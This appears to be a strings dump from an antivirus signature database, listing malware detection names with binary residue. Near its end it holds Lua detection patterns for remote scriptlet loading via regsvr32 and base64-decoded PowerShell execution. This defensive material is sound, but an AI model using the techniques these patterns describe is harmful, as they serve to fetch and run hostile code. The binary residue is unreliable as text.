Y#PERSIST_ContextualDropJavaTempLikeCorrupt Y#PERSIST_ContextualDropJavaTempLikeCorruptU0A Y#PERSIST_SoftwareBundler:Win32/Outbrowse.D Y#PERSIST_SoftwareBundler:Win32/Outbrowse.DU0 :#Lowfi:HSTR:Trojan:Win32/Cryptloader.A!dha :#Lowfi:HSTR:Trojan:Win32/Cryptloader.A!dhaU0Q :#Lowfi:do_exhaustivehstr_rescan_nivdort_ao :#Lowfi:do_exhaustivehstr_rescan_nivdort_aoU0= :#Worm:VBS/JenxcusBladabindi.FileDrop!Lowfi :#Worm:VBS/JenxcusBladabindi.FileDrop!LowfiU0 :#LowFi:KCRC:VirTool:Win32/AutoItInjectorVZ :#LowFi:KCRC:VirTool:Win32/AutoItInjectorVZU0b :#Lowfi:SCPT:Worm:VBS/Jenxcus!JunkDimIfThen :#Lowfi:SCPT:Worm:VBS/Jenxcus!JunkDimIfThenU0 :#Lowfi:AGGREGATOR:REG/DisallowedCert_Baidu :#Lowfi:AGGREGATOR:REG/DisallowedCert_BaiduU0 Y#PERSIST_TrojanDownloader:Win32/Putabmow.D Y#PERSIST_TrojanDownloader:Win32/Putabmow.DU0 :#Lowfi:AGGREGATOR:REG/DisallowedCert_Panda :#Lowfi:AGGREGATOR:REG/DisallowedCert_PandaU0 :#LowFi:SigAttr:Backdoor:Win64/Shoive.C!dha :#LowFi:SigAttr:Backdoor:Win64/Shoive.C!dhaU0 :#Lowfi:HSTR:VirTool:MSIL/GeneralPacker.S07 :#Lowfi:HSTR:VirTool:MSIL/GeneralPacker.S07U0`w :#Lowfi:HSTR:TrojanDownload:Win32/Bosclep.A :#Lowfi:HSTR:TrojanDownload:Win32/Bosclep.AU0 Y#PERSIST:TrojanDropper:Win32/Scieron.D!dha Y#PERSIST:TrojanDropper:Win32/Scieron.D!dhaU0~ :#Lowfi:PESTATIC:Trojan:Win64/DelfInt.B!dha :#Lowfi:PESTATIC:Trojan:Win64/DelfInt.B!dhaU0M :#Lowfi:AGGREGATOR:REG/DisallowedCert_Trend :#Lowfi:AGGREGATOR:REG/DisallowedCert_TrendU0 :#Lowfi:AGG:SWF/Obfuscator.NeutrinoEKLike.F :#Lowfi:AGG:SWF/Obfuscator.NeutrinoEKLike.FU0& :#SLF:Exploit:Win32/WinHttpAutoProxySvcDrop :#SLF:Exploit:Win32/WinHttpAutoProxySvcDropU0k :#LowFi:Adware:Win32/TopMoxie!LikeyCleanPUS :#LowFi:Adware:Win32/TopMoxie!LikeyCleanPUSU0{.E :#Lowfi:HSTR:BrowserModifier:Win32/Neobar.A :#Lowfi:HSTR:BrowserModifier:Win32/Neobar.AU0 Y#PERSIST:HSTR:VirTool:Win32/Obfuscator.AKS Y#PERSIST:HSTR:VirTool:Win32/Obfuscator.AKSU0 :#LowFi:Adware:Win32/Addendum!LikeyCleanPUS :#LowFi:Adware:Win32/Addendum!LikeyCleanPUSU0 :#Lowfi:HSTR:TrojanSpy:Win32/Wekrober_crypt :#Lowfi:HSTR:TrojanSpy:Win32/Wekrober_cryptU0 )#:1:z:2:NSIS_3_0_b0_zlib_solid-x86-unicode )#:1:z:2:NSIS_3_0_b0_zlib_solid-x86-unicodeU0^ Y#PERSIST:HSTR:Trojan:Win32/Boracefig.A!dha Y#PERSIST:HSTR:Trojan:Win32/Boracefig.A!dhaU0K :#Lowfi:SCRIPT:TrojanClicker:JS/Faceliker.A :#Lowfi:SCRIPT:TrojanClicker:JS/Faceliker.AU0 ]#Lowfi:Rep:CMD:Trojan:Win32/TrapsDisableAV ]#Lowfi:Rep:CMD:Trojan:Win32/TrapsDisableAVU0) :#Lowfi:HSTR:VirTool:MSIL/GeneralPacker.S0B :#Lowfi:HSTR:VirTool:MSIL/GeneralPacker.S0BU0 )#:1:l:2:NSIS_3_0_b1_lzma_solid-x86-unicode )#:1:l:2:NSIS_3_0_b1_lzma_solid-x86-unicodeU1 :#LowFi:Trojan:Win32/SuspiciousGetApiAddress :#LowFi:Trojan:Win32/SuspiciousGetApiAddressU1 :#LowFi:Adware:Win32/Advantage!LikeyCleanPUS :#LowFi:Adware:Win32/Advantage!LikeyCleanPUSU1 )#:1:b:2:NSIS_3_0_b0_bzip2_solid-x86-unicode )#:1:b:2:NSIS_3_0_b0_bzip2_solid-x86-unicodeU1!) :#Lowfi:HSTR:VirTool:Win32/Obfuscator.ACV!SF :#Lowfi:HSTR:VirTool:Win32/Obfuscator.ACV!SFU1 :#Lowfi:TrojanDownloader:O97M/Donoff.gen!E.1 :#Lowfi:TrojanDownloader:O97M/Donoff.gen!E.1U1* s :#Lowfi:SIGATTR:VirTool:Win32/Injector.gen!E s :#Lowfi:SIGATTR:VirTool:Win32/Injector.gen!EU1 N#Lowfi:Lua:SuspiciousExeFileInProgramData.A N#Lowfi:Lua:SuspiciousExeFileInProgramData.AU1 Y#PERSIST_ContextualDrop2JavaTempLikeCorrupt Y#PERSIST_ContextualDrop2JavaTempLikeCorruptU1w :#Lowfi:SCRIPTLOWFI:Trojan:AutoIt/Injector.C :#Lowfi:SCRIPTLOWFI:Trojan:AutoIt/Injector.CU1 :#Lowfi:HSTR:MSIL/Obfuscator.DotNetPatcher.A :#Lowfi:HSTR:MSIL/Obfuscator.DotNetPatcher.AU1 )#:1:l:2:NSIS_3_0_rc1_lzma_solid-x86-unicode )#:1:l:2:NSIS_3_0_rc1_lzma_solid-x86-unicodeU1D N#Lowfi:IOAVPEInZIPinTopLevelUncompressedZip N#Lowfi:IOAVPEInZIPinTopLevelUncompressedZipU1 :#LOWFI:HSTR:TrojanDownloader:Win32/Fendires :#LOWFI:HSTR:TrojanDownloader:Win32/FendiresU1* Y#PERSIST:LoD:VirTool:Win32/Obfuscator.ACV.2 Y#PERSIST:LoD:VirTool:Win32/Obfuscator.ACV.2U1 %]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l4 %]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l4U1 (:#LowFi:Adware:Win32/Kremiumad!LikeyCleanPUS (:#LowFi:Adware:Win32/Kremiumad!LikeyCleanPUSU1 (:#Lowfi:Lua:WrittenToDesktopFolderByExplorer (:#Lowfi:Lua:WrittenToDesktopFolderByExplorerU1&5 *Y#Persist:SCPT:Trojan:JS/Kilim_AutoIt_Chrome *Y#Persist:SCPT:Trojan:JS/Kilim_AutoIt_ChromeU1 +:#Lowfi:SCPT:Exploit:JS/Axpergle_inmem_lowfi +:#Lowfi:SCPT:Exploit:JS/Axpergle_inmem_lowfiU1 /+:#Lowfi:SIGATTR:TrojanDropper:Win32/Sefnit.A /+:#Lowfi:SIGATTR:TrojanDropper:Win32/Sefnit.AU1 _5,]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l8 _5,]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l8U1 v-:#Lowfi:VirTool:Win32/Obfuscator.ADB_Reveton v-:#Lowfi:VirTool:Win32/Obfuscator.ADB_RevetonU1 y/:#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.ANV y/:#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.ANVU1 0)#:1:b:2:NSIS_3_0_b3_bzip2_solid-x86-unicode 0)#:1:b:2:NSIS_3_0_b3_bzip2_solid-x86-unicodeU1d s0:#Lowfi:HSTR:BrowserModifier:ConsentBypass.I s0:#Lowfi:HSTR:BrowserModifier:ConsentBypass.IU1 2:#Lowfi:HSTR:TrojanDropper:MSIL/Bladabindi.C 2:#Lowfi:HSTR:TrojanDropper:MSIL/Bladabindi.CU1 2Y#PERSIST:HSTR:VirTool:MSIL/Obfuscator.NET.A 2Y#PERSIST:HSTR:VirTool:MSIL/Obfuscator.NET.AU1- K4:#Lowfi:Lua:WrittenToDownloadFolderByUpdater K4:#Lowfi:Lua:WrittenToDownloadFolderByUpdaterU1 8:#LowFiExp:Win32/ContextualAccessJavawTempJc 8:#LowFiExp:Win32/ContextualAccessJavawTempJcU1O 9:#Lowfi:HSTR:BrowserModifier:ConsentBypass.E 9:#Lowfi:HSTR:BrowserModifier:ConsentBypass.EU1 w::#Lowfi:SCRIPT:VirTool:Win32/Injector.gen!EP w::#Lowfi:SCRIPT:VirTool:Win32/Injector.gen!EPU1 :Y#PERSIST:Lowfi:Backdoor:Win32/Hikiti.G1!dha :Y#PERSIST:Lowfi:Backdoor:Win32/Hikiti.G1!dhaU1 =:#Lowfi:IOAVSingleStoredEXEInTopLevelRARFile =:#Lowfi:IOAVSingleStoredEXEInTopLevelRARFileU1 uk?:#Lowfi:Lua:SuspiciousHostExeFileInAppdata.A uk?:#Lowfi:Lua:SuspiciousHostExeFileInAppdata.AU17e A:#Lowfi:SIGA:Trojan:MSIL/SuspiciousRegAdd.S1 A:#Lowfi:SIGA:Trojan:MSIL/SuspiciousRegAdd.S1U1 A:#SCRIPT:Worm:VBS/Jenxcus.PostFunction!Lowfi A:#SCRIPT:Worm:VBS/Jenxcus.PostFunction!LowfiU16 B:#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.AJZ B:#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.AJZU1J E:#Lowfi:HSTR:TrojanDropper:MSIL/Bladabindi.B gwSE:#Lowfi:HSTR:TrojanSefnit_packer3_clickfraud E:#Lowfi:HSTR:TrojanDropper:MSIL/Bladabindi.BU1gwSE:#Lowfi:HSTR:TrojanSefnit_packer3_clickfraudU1 tG:#Lowfi:HSTR:BrowserModifier:ConsentBypass.H tG:#Lowfi:HSTR:BrowserModifier:ConsentBypass.HU1DA HY#PERSIST:Lowfi:SCPT:PHP/ChopperWebShell!dha HY#PERSIST:Lowfi:SCPT:PHP/ChopperWebShell!dhaU1 IY#PERSIST:HSTR:Exploit:Win32/DouglasTran!dha IY#PERSIST:HSTR:Exploit:Win32/DouglasTran!dhaU1 l;KY#PERSIST:SoftwareBundler:Win32/Vittalia.ZZA l;KY#PERSIST:SoftwareBundler:Win32/Vittalia.ZZAU1 K)#:1:l:2:NSIS_3_0_strlen_lzma_solid-x86-ansi K)#:1:l:2:NSIS_3_0_strlen_lzma_solid-x86-ansiU1 N:#Lowfi:HSTR:BrowserModifier:ConsentBypass.D N:#Lowfi:HSTR:BrowserModifier:ConsentBypass.DU1 5R)#:1:b:2:NSIS_3_0_a1_bzip2_solid-x86-unicode 5R)#:1:b:2:NSIS_3_0_a1_bzip2_solid-x86-unicodeU1`# R]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l5 R]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l5U1y U]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l1 U]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l1U1 WX:#LowFi:Adware:Win32/GameVance!LikeyCleanPUS WX:#LowFi:Adware:Win32/GameVance!LikeyCleanPUSU1~ Y:#LOWFI:SCPT:Program:Win32/CodecPlayerRKR.A4 Y:#LOWFI:SCPT:Program:Win32/CodecPlayerRKR.A4U1 l:Z:#Lowfi:Lua:WrittenToDesktopFolderByArchiver Ko2[]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l9 l:Z:#Lowfi:Lua:WrittenToDesktopFolderByArchiverU1Ko2[]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l9U1 \\:#Lowfi:SoftwareBundler:Win32/InstallMonster \\:#Lowfi:SoftwareBundler:Win32/InstallMonsterU1 ]:#Lowfi:AGGREGATOR:TrojanSpy:Win32/Nivdort.K ]:#Lowfi:AGGREGATOR:TrojanSpy:Win32/Nivdort.KU1 ^Y#PERSIST:HSTR:HackTool:Win32/OmarPWDump!dha ^Y#PERSIST:HSTR:HackTool:Win32/OmarPWDump!dhaU1 e:#Lowfi:SIGATTR:TrojanSpy:Win32/Bancos.ALJ.1 e:#Lowfi:SIGATTR:TrojanSpy:Win32/Bancos.ALJ.1U1MB eY#Persist:Trojan:Win32/Wysotot_BrowserModify 0+EgY#PERSIST:LowFi:VirTool:Win32/Obfuscator.AKE eY#Persist:Trojan:Win32/Wysotot_BrowserModifyU10+EgY#PERSIST:LowFi:VirTool:Win32/Obfuscator.AKEU1 g:#Lowfi:HSTR:VirTool:MSIL/Crpyter.Ahmadkifre g:#Lowfi:HSTR:VirTool:MSIL/Crpyter.AhmadkifreU1 gY#Lowfi:HSTR:VirTool:MSIL/Crpyter.Ahmadkifre gY#Lowfi:HSTR:VirTool:MSIL/Crpyter.AhmadkifreU1P g)#:1:b:2:NSIS_3_0_a2_bzip2_solid-x86-unicode g)#:1:b:2:NSIS_3_0_a2_bzip2_solid-x86-unicodeU1F Wj:#Lowfi:SCPT:TrojanDropper:Win32/Fynlonski.A Wj:#Lowfi:SCPT:TrojanDropper:Win32/Fynlonski.AU1 k:#Lowfi:SCRIPT:TrojanDropper:Win32/Sarvdap.A k:#Lowfi:SCRIPT:TrojanDropper:Win32/Sarvdap.AU1@ `o:#Lowfi:HSTR:VirTool:Win32/GeneralPacker.S04 `o:#Lowfi:HSTR:VirTool:Win32/GeneralPacker.S04U1 s:#Lowfi:PESTATIC:Backdoor:Win32/NetWiredRC.B s:#Lowfi:PESTATIC:Backdoor:Win32/NetWiredRC.BU1 $Rt:#Lowfi:AGGREGATOR:REG/DisallowedCert_McAfee $Rt:#Lowfi:AGGREGATOR:REG/DisallowedCert_McAfeeU1 wY#PERSIST:Cutwail_Upatre_GameOver_Obfuscator wY#PERSIST:Cutwail_Upatre_GameOver_ObfuscatorU1 8z:#LowFi:Adware:Win32/FlvDirect!LikeyCleanPUS 8z:#LowFi:Adware:Win32/FlvDirect!LikeyCleanPUSU1 E{Y#PERSIST_HSTR:TrojanDropper:Win32/Filcout.A v'\\|:#Lowfi:HSTR:VirTool:Win32/Injector.CL!lowfi blO}:#LowFi:TrojanDownloader:Java/OpenConnection E{Y#PERSIST_HSTR:TrojanDropper:Win32/Filcout.AU1v'\\|:#Lowfi:HSTR:VirTool:Win32/Injector.CL!lowfiU1blO}:#LowFi:TrojanDownloader:Java/OpenConnectionU1 :#LowFiExp:Win32/ContextualModJavaTempLikeJc :#LowFiExp:Win32/ContextualModJavaTempLikeJcU1 :#Lowfi:SIGATTR:Trojan:Win32/Startpage.gen!A :#Lowfi:SIGATTR:Trojan:Win32/Startpage.gen!AU1 Y#PERSIST_ContextualDropJavawTempLikeCorrupt Y#PERSIST_ContextualDropJavawTempLikeCorruptU1# :#LowFi:Adware:Win32/Koutodoor!LikeyCleanPUS :#LowFi:Adware:Win32/Koutodoor!LikeyCleanPUSU1 :#Lowfi:HSTR:VirTool:Win32/Obfuscator.ADB!EP :#Lowfi:HSTR:VirTool:Win32/Obfuscator.ADB!EPU1 )#:1:z:2:NSIS_3_0_rc1_zlib_solid-x86-unicode )#:1:z:2:NSIS_3_0_rc1_zlib_solid-x86-unicodeU1& Y#PERSIST:Lowfi:PEBMPAT:AntiEmuTimeStampREAD Y#PERSIST:Lowfi:PEBMPAT:AntiEmuTimeStampREADU1 Y#PERSIST_SIGATTR:Program:Win32/OptimizerPro Y#PERSIST_SIGATTR:Program:Win32/OptimizerProU1 )#:1:b:2:NSIS_3_0_b2_bzip2_solid-x86-unicode )#:1:b:2:NSIS_3_0_b2_bzip2_solid-x86-unicodeU1- :#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.APC :#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.APCU1K`o )#:0:l:2:NSIS_3_0_b2_strlen_lzma-x86-unicode )#:0:l:2:NSIS_3_0_b2_strlen_lzma-x86-unicodeU1 :#Lowfi:LUA:TrojanDropper:Win32/Exdrop.gen!A :#Lowfi:LUA:TrojanDropper:Win32/Exdrop.gen!AU1 :#Lowfi:HSTR:SefnitClickfraudComponent_Type2 :#Lowfi:HSTR:SefnitClickfraudComponent_Type2U1 )#:1:b:2:NSIS_3_0_b1_bzip2_solid-x86-unicode )#:1:b:2:NSIS_3_0_b1_bzip2_solid-x86-unicodeU1$ :#Lowfi:AGG:TrojanDownloader:Win32/Papdoof.A :#Lowfi:AGG:TrojanDownloader:Win32/Papdoof.AU1)@ :#LowFi:Adware:Win32/ArcadeWeb!LikeyCleanPUS :#LowFi:Adware:Win32/ArcadeWeb!LikeyCleanPUSU1 :#Lowfi:HSTR:BrowserModifier:ConsentBypass.B :#Lowfi:HSTR:BrowserModifier:ConsentBypass.BU1 :#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.AOQ :#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.AOQU1 Y#PERSIST:HSTR:VirTool:Win32/QuarkPwDump!dha Y#PERSIST:HSTR:VirTool:Win32/QuarkPwDump!dhaU1 ]#LowFi:Lua:Worm:JS/Bondat!LnkTargetJs_lowfi ]#LowFi:Lua:Worm:JS/Bondat!LnkTargetJs_lowfiU1 :#LowFiExp:Win32/ContextualDropJavawTempLike :#LowFiExp:Win32/ContextualDropJavawTempLikeU1K~ :#LOWFI:SCPT:Program:Win32/CodecPlayerRKR.A2 :#LOWFI:SCPT:Program:Win32/CodecPlayerRKR.A2U1 :#LowFi:SIGATTR:VirTool:JS/Obfuscator!Bondat :#LowFi:SIGATTR:VirTool:JS/Obfuscator!BondatU18 :#Lowfi:SIGATTR:TrojanDropper:Win32/Sefnit.B :#Lowfi:SIGATTR:TrojanDropper:Win32/Sefnit.BU1% Y#PERSIST:TrojanDropper:Win32/Seenabhi.A!dha Y#PERSIST:TrojanDropper:Win32/Seenabhi.A!dhaU1 :#Lowfi:AGGREGATOR:TrojanSpy:Win32/Nivdort.M :#Lowfi:AGGREGATOR:TrojanSpy:Win32/Nivdort.MU1 :#LowFi:Adware:Win32/PigSearch!LikeyCleanPUS :#LowFi:Adware:Win32/PigSearch!LikeyCleanPUSU1 :#LowFi:HSTR:VirTool:Win32/VBInject_emotet.4 :#LowFi:HSTR:VirTool:Win32/VBInject_emotet.4U1( :#Lowfi:SIGATTR:TrojanDownloader:VBS/Adodb.B :#Lowfi:SIGATTR:TrojanDownloader:VBS/Adodb.BU1 :#LowFiExp:Win32/ContextualDrop2JavaTempLike :#LowFiExp:Win32/ContextualDrop2JavaTempLikeU1z{* :#Lowfi:TrojanDownloader:PowerShell/Drixed.A :#Lowfi:TrojanDownloader:PowerShell/Drixed.AU1U ]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l3 ]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l3U1LB ]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l7 ]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l7U1 :#LowFi:Adware:Win32/Enumerate!LikeyCleanPUS :#LowFi:Adware:Win32/Enumerate!LikeyCleanPUSU1 )#:1:z:2:NSIS_3_0_strlen_zlib_solid-x86-ansi )#:1:z:2:NSIS_3_0_strlen_zlib_solid-x86-ansiU1r :#Lowfi:AGGREGATOR:TrojanSpy:Win32/Nivdort.L :#Lowfi:AGGREGATOR:TrojanSpy:Win32/Nivdort.LU1 :#Lowfi:SIGATTR:TrojanDropper:Win32/Sefnit.C :#Lowfi:SIGATTR:TrojanDropper:Win32/Sefnit.CU1 :#LOWFI:SCPT:Program:Win32/CodecPlayerRKR.A3 :#LOWFI:SCPT:Program:Win32/CodecPlayerRKR.A3U1 ]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l6 ]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l6U1J :#LowFi:HSTR:TrojanSpy:Win32/Xtrat!WriteFile :#LowFi:HSTR:TrojanSpy:Win32/Xtrat!WriteFileU1 ]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l2 ]#LowFi:Trojan:Win32/OfficeStartupAbuse.A!l2U1 :#Lowfi:SIGATTR:TrojanClickerClikugInstaller :#Lowfi:SIGATTR:TrojanClickerClikugInstallerU1zW :#Lowfi:HSTR:BrowserModifier:ConsentBypass.C :#Lowfi:HSTR:BrowserModifier:ConsentBypass.CU1 :#Lowfi:SIGATTR:TrojanDropper:Win32/Bradop.B :#Lowfi:SIGATTR:TrojanDropper:Win32/Bradop.BU1 :#LowFiSIGATTR:Trojan:Win32/CopySelf_AppData :#LowFiSIGATTR:Trojan:Win32/CopySelf_AppDataU1c :#Lowfi:HSTR:BrowserModifier:ConsentBypass.G :#Lowfi:HSTR:BrowserModifier:ConsentBypass.GU1=Y :#Lowfi:Lua:WrittenToDownloadFolderByTorrent :#Lowfi:Lua:WrittenToDownloadFolderByTorrentU1 :#Lowfi:Lua:WrittenToDownloadFolderByBrowser :#Lowfi:Lua:WrittenToDownloadFolderByBrowserU1Ih :#Lowfi:HSTR:VirTool:MSIL/BitmapDecryption.B :#Lowfi:HSTR:VirTool:MSIL/BitmapDecryption.BU1 :#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.APF :#Lowfi:SIGATTR:VirTool:Win32/Obfuscator.APFU1 :#HSTR:TrojanDropper:Win32/Evotob_Decryption :#HSTR:TrojanDropper:Win32/Evotob_DecryptionU1Y )#:0:z:2:NSIS_3_0_b2_strlen_zlib-x86-unicode )#:0:z:2:NSIS_3_0_b2_strlen_zlib-x86-unicodeU1 :#Lowfi:ImpHash:VirTool:Win32/Obfuscator.APD :#Lowfi:ImpHash:VirTool:Win32/Obfuscator.APDU1dp# Y#PERSIST:TrojanDropper:Win32/Noratops.A!dha Y#PERSIST:TrojanDropper:Win32/Noratops.A!dhaU1) _#TELPER:SCRIPT:MpTamperAmsiScanExcludeDrive _#TELPER:SCRIPT:MpTamperAmsiScanExcludeDriveU1I :#Lowfi:HSTR:VirTool:MSIL:Injector.Fomaltons :#Lowfi:HSTR:VirTool:MSIL:Injector.FomaltonsU1I :#Lowfi:HSTR:BrowserModifier:Win32/DNUpdater :#Lowfi:HSTR:BrowserModifier:Win32/DNUpdaterU1 :#Lowfi:SCRIPT:TrojanDropper:Win32/Sarvdap.B :#Lowfi:SCRIPT:TrojanDropper:Win32/Sarvdap.BU1G :#Lowfi:HSTR:VirTool:Win32/DelfInject.gen!DB :#Lowfi:HSTR:VirTool:Win32/DelfInject.gen!DBU1 Y#PERSIST:TrojanDownloader:Win32/Lecna.A!dha Y#PERSIST:TrojanDownloader:Win32/Lecna.A!dhaU19 ]#LowFi:ShadowCopyDeletionNonRootFriendlyLOL ]#LowFi:ShadowCopyDeletionNonRootFriendlyLOLU1 # )#:1:b:2:NSIS_3_0_a0_bzip2_solid-x86-unicode )#:1:b:2:NSIS_3_0_a0_bzip2_solid-x86-unicodeU2 :#LowFi:Lua:ExecutableUsingImageExtension!dha :#LowFi:Lua:ExecutableUsingImageExtension!dhaU2 Y#PERSIST:HSTR:VirTool:MSIL/Obfuscator.Rcpack Y#PERSIST:HSTR:VirTool:MSIL/Obfuscator.RcpackU2 Y#PERSIST_ContextualAccessJavaTempLikeCorrupt Y#PERSIST_ContextualAccessJavaTempLikeCorruptU2` ]#LowFi:BMLua:AccessibilityEscalation.D!sethc ]#LowFi:BMLua:AccessibilityEscalation.D!sethcU2dc :#Lowfi:SCRIPT:Trojan:PowerShell/RedPowdump.B :#Lowfi:SCRIPT:Trojan:PowerShell/RedPowdump.BU2 Y#PERSIST_Lua:SuspiciousAcrord32infoStartup.A Y#PERSIST_Lua:SuspiciousAcrord32infoStartup.AU2 :#Lowfi:SIGATTR:VirTool:Win32/Injector.gen!BR :#Lowfi:SIGATTR:VirTool:Win32/Injector.gen!BRU2 Y#PERSIST:Program:Win32/Bitmonero!LikelyClean Y#PERSIST:Program:Win32/Bitmonero!LikelyCleanU2 :#Lowfi:HSTR:TrojanSefnit_TorComponent_Bitmap :#Lowfi:HSTR:TrojanSefnit_TorComponent_BitmapU2C :#Lowfi:HSTR:Win32/Packer.Delphi.Decryption.A :#Lowfi:HSTR:Win32/Packer.Delphi.Decryption.AU2 $!)#:1:z:2:NSIS_3_01_strlen_zlib_solid-x86-ansi $!)#:1:z:2:NSIS_3_01_strlen_zlib_solid-x86-ansiU2\\ \":#LowfiREG/CompromisedCert_KeepMyFamilySecure \":#LowfiREG/CompromisedCert_KeepMyFamilySecureU2 #:#Lowfi:HSTR:TrojanDownloader:Win32/Cerewow.A #:#Lowfi:HSTR:TrojanDownloader:Win32/Cerewow.AU2P #:#Lowfi:IMPHASH:TrojanDownloader:Win32/Adload #:#Lowfi:IMPHASH:TrojanDownloader:Win32/AdloadU2v- #:#Lowfi:HSTR:TrojanDownloader:Win32/Papdoof.A #:#Lowfi:HSTR:TrojanDownloader:Win32/Papdoof.AU2 #)#:1:z:2:NSIS_3_02_strlen_zlib_solid-x86-ansi #)#:1:z:2:NSIS_3_02_strlen_zlib_solid-x86-ansiU2Vh &:#LowFi:Adware:MSIL/Strongvault!LikeyCleanPUS &:#LowFi:Adware:MSIL/Strongvault!LikeyCleanPUSU2eZ +:#Lowfi:HSTR:TrojanDownloader:Win32/Filcout.B pox.:#LOWFI:SoftwareBundler:Win32/OxyPumper_AffId +:#Lowfi:HSTR:TrojanDownloader:Win32/Filcout.BU2pox.:#LOWFI:SoftwareBundler:Win32/OxyPumper_AffIdU2 .:#Lowfi:Trojan:Win32/SandCastleMagicFile!MSFT .:#Lowfi:Trojan:Win32/SandCastleMagicFile!MSFTU2 2Y#PERSIST:HSTR:Backdoor:Win32/Genevieve.B!dha 2Y#PERSIST:HSTR:Backdoor:Win32/Genevieve.B!dhaU2 8Y#PERSIST:SoftwareBundler:Win32/GoFileExpress 8Y#PERSIST:SoftwareBundler:Win32/GoFileExpressU2 ;]#LowFi:BMLua:AccessibilityEscalation.Z!sethc ;]#LowFi:BMLua:AccessibilityEscalation.Z!sethcU2dm =:#Lowfi:Lua:WrittenToDo %w+%.lck \t%w+%.lck %w+%.idx \t%w+%.idx !#Lua:DorkbotFileName.A flashdefaultpack.exe Lua:DorkbotFileName.A!RH Lua:DorkbotFileName.A 10958fe944e8 decrypted count_mov_eax count_mov_edx count_mov_dl count_xchg_edi count_mov_esi count_pushpop_ecx count_mov_ch count_mnop count_xchg_edx count_pushpop_esi !decrypted [Obfuscator.ZV] 11956216fd76 1c955dc20319 f9d74bd8f863 Lua:MpRequestEmsScan beammp-launcher nginx ^(%d%d%d+)_(.+)$ SCANSOURCE_RTSIG Solorigate split_path ^Trojan:MSIL/Solorigate.BR!dha solarwinds.businesslayerhost.exe !solarwinds.businesslayerhost.exe configurationwizard.exe IsFileOpenedByProcess OrionModuleEngine (.-)([^\\]-([^\\%.]+))$ !#Lua:GlbFileInOfficeFile.A !#Lua:GlbFileInOfficeFile.AIncludesResearchDataObMpAttributes ->word/media/ data%:application%/gltf%-buffer%;base64%,(.-)\" /data%:application%/gltf%-buffer%;base64%,(.-)\" Lua:GlbInOfficeFileHasBase64.A Lua:GlbInOfficeFileHasSuspOffsetF0.A %Lua:GlbInOfficeFileHasSuspOffsetF0.A Lua:GlbInOfficeFileHasSuspOffsetF8.A %Lua:GlbInOfficeFileHasSuspOffsetF8.A 2c37826207ad7 HSTR:VirTool:Win32/Obfuscator.ALT1 #HSTR:VirTool:Win32/Obfuscator.ALT1 HSTR:VirTool:Win32/Obfuscator.ALT2 #HSTR:VirTool:Win32/Obfuscator.ALT2 LoD:VirTool:Win32/Obfuscator.ACV.3 #LoD:VirTool:Win32/Obfuscator.ACV.3 HSTR:VirTool:Win32/Obfuscator.ALT3 #HSTR:VirTool:Win32/Obfuscator.ALT3 55b3b042e32e dbb3177f2d11 dbb3177f2d11IncludesBMLuaLib \\programdata\\microsoft\\windows defender\\definition updates\\{%x%x%x%x%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%x%x%x%x%x%x%x%x}\\mpksldrv%.sys %%common_appdata%%\\microsoft\\windows defender\\definition updates\\{%x%x%x%x%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%x%x%x%x%x%x%x%x}\\mpksldrv%.sys \\windows\\system32\\mpenginestore\\mpksldrv.sys -\\windows\\system32\\mpenginestore\\mpksldrv.sys \\(mpksl[%w]+) Filcout hFileScoutKey HKCR\\*\\shell\\filescout hUnknownFileKey HKCR\\*\\shell\\unknownfile hUnknownKey HKCR\\Unknown\\shell\\openas\\command \"HKCR\\Unknown\\shell\\openas\\command defaultValueData filescout.exe unknownfile.exe SetRegValueAsStringExpand %SystemRoot%\\system32\\OpenWith.exe \"%1\" (%SystemRoot%\\system32\\OpenWith.exe \"%1\" %SystemRoot%\\system32\\rundll32.exe %SystemRoot%\\system32\\shell32.dll,OpenAs_RunDLL %1 V%SystemRoot%\\system32\\rundll32.exe %SystemRoot%\\system32\\shell32.dll,OpenAs_RunDLL %1 delegateexecuteValueData fs_DelegateExecute {e44e9428-bdbc-4987-a099-40dc8fd255e7} '{e44e9428-bdbc-4987-a099-40dc8fd255e7} DelegateExecute !#Lua:ContextPEExtractedFromArchive \\temp\\rar$ex \\temp\\7zo \\temp\\wz[0-9a-f][0-9a-f][0-9a-f][0-9a-f]$ *\\temp\\wz[0-9a-f][0-9a-f][0-9a-f][0-9a-f]$ irsetup.exe \\temp\\temp[0-9]_.+%.zip$ Powemet regsvr32.+/i%:http.+scrobj%.dll regsvr32.+/i%:http.+scrobj%.dll iex%s*%(%[text%.encoding%]%:%:ascii%.getstring%(%[convert%]%:%:frombase64string%(%(gp%s*%'hk ]iex%s*%(%[text%.encoding%]%:%:ascii%.getstring%(%[convert%]%:%:frombase64string%(%(gp%s*%'hk !#Lua:ScriptExtractedFileInZip.A 04,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDERB(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Device ControlN(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Device Control\\*(infinite)>(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS 